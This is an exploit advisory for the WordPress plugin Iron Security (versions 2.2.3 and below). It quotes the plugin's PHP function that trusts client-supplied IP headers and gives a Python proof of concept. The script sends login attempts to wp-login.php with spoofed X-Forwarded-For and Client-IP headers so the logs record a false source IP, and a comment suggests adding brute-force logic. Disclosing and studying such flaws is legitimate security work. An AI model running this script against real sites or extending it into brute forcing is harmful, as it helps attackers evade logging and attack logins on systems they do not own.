# Wordpress Plugin Iron Security - IP Spoofing # Exploit Author: bRpsd | cy[at]live.no # Date: March 20, 2025 # Product: https://wordpress.org/plugins/iron-security/ # Version: 2.2.3 and below # CVE : N/A Summary: Iron Security is the ultimate WordPress security plugin built to secure and harden your website with essential protection features. Whether you’re a blogger, business owner, or developer, Iron Security helps keep your site safe from attacks and unauthorized access. with a user-friendly interface and effective tools like custom login URL, HTTP security headers, Iron Security is the all-in-one solution for WordPress security. The script logs successful/fail attempts of logins along with other actions made by users into a log table in database, within the logged data is the IP. However it uses a weak logic of grabbing IP making it easier to evade and not detect the original IP but rather a spoofed one. PHP function logic: ========================================================================================== private static function get_client_ip() { $ip = '0.0.0.0'; // Check for shared internet/ISP IP if (!empty($_SERVER['HTTP_CLIENT_IP']) && self::validate_ip($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } // Check for IPs passing through proxies elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { // Check if multiple IPs $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); foreach ($ips as $ip_address) { $ip_address = trim($ip_address); if (self::validate_ip($ip_address)) { $ip = $ip_address; break; } } } // Check for the remote address elseif (!empty($_SERVER['REMOTE_ADDR']) && self::validate_ip($_SERVER['REMOTE_ADDR'])) { $ip = $_SERVER['REMOTE_ADDR']; } return $ip; } ========================================================================================== Risk: The plugin retrieves client IP addresses from potentially untrusted headers such as X-Forwarded-For & Client-IP, allowing an attacker to manipulate its value. This may be used to hide the source of malicious traffic. Below is a simple example of a python code that does a failed login attempt with a spoofed IP that will get logged in database & system due to insufficient IP address validation and use of user-supplied HTTP headers as a primary method for IP retrieval. ======= POC ======= import requests # Target URL for login [can be other functions that get logged as well] url = "http://localhost/wordpress/wp-login.php" # Spoofed IP address spoofed_ip = "1.1.1.1" # In this example we used a failed login, in a real scenario a brute force logic can be here username = "test" password = "test" # Headers with spoofed IP headers = { "User-Agent": "Mozilla/5.0", "X-Forwarded-For": spoofed_ip, "Client-IP": spoofed_ip } # Login data data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": "/wp-admin/", "testcookie": "1" } # Send the login request response = requests.post(url, headers=headers, data=data) # Check the response print("Status Code:", response.status_code)